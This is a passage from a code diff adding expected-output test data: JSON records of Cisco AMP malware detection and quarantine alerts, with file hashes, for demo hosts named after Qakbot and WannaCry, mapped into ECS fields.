Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6412680266518626000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.E4FCCBFA69-95.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6412680266518626316",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T20:18:05.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843514761Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6412680266518626000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "detection_id": "6412680266518626318",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T20:18:05.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843516637Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6412680266518626000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "detection_id": "6412680266518626316",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843518525Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419303574240494000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419303574240493599",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843520650Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419303574240494000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419303574240493597",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843522517Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419303574240494000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419303569945526295",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843524393Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526294\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419303574240494000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419303569945526294",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843526269Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526293\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419303574240494000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419303569945526293",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843528155Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526292\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419303574240494000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419303569945526292",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843558928Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526291\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419303574240494000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419303569945526291",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "hash": {
